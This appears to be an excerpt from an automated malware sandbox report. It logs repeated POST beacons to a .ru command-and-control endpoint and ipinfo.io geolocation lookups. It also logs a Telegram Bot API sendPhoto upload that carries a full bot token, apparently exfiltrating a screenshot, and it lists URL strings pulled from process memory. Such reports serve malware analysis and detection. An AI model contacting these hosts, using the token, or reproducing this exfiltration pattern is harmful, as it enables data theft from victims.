Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1708Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io

Source: global traffic	DNS traffic detected: DNS query: 047506cm.nyanyash.ru
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: tse1.mm.bing.net

Source: unknown

HTTP traffic detected: POST /bot7879148704:AAFNNtpKlCmwPR7xOBNG2DRo_nYZIdzpXqk/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="b9b0179c-0f93-4e0b-aa87-b9314e29d2c3"Host: api.telegram.orgContent-Length: 99507Expect: 100-continueConnection: Keep-Alive

Source: powershell.exe, 00000014.00000002.3311542989.0000026F7EAF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 0000001C.00000002.3254657919.000001FA6FBA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: svchost.exe, 00000032.00000003.1876329348.000001871B618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000032.00000003.1876329348.000001871B618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000032.00000003.1876329348.000001871B618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000032.00000003.1876329348.000001871B618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000032.00000003.1876329348.000001871B618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000032.00000003.1876329348.000001871B618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000032.00000003.1876329348.000001871B64D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000032.00000003.1876329348.000001871B707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000013.00000002.3027055525.0000022F14844000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2810868073.0000026F10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2996178084.000001EA14944000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3072476405.000002385EA14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2965146623.0000019424315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000013.00000002.1850990457.0000022F049FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1834361095.0000026F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1846240791.000001EA04AF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1849712959.000002384EBC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1850541934.00000194144C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: SfbAu0ICZn.exe, 00000000.00000002.1721991352.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1850990457.0000022F047D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1834361095.0000026F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1846240791.000001EA048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1849712959.000002384E9A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1850541934.00000194142A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1833856848.000001FA00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000013.00000002.1850990457.0000022F049FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1834361095.0000026F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1846240791.000001EA04AF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1849712959.000002384EBC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1850541934.00000194144C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001C.00000002.3280691728.000001FA6FDDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micft.cosof
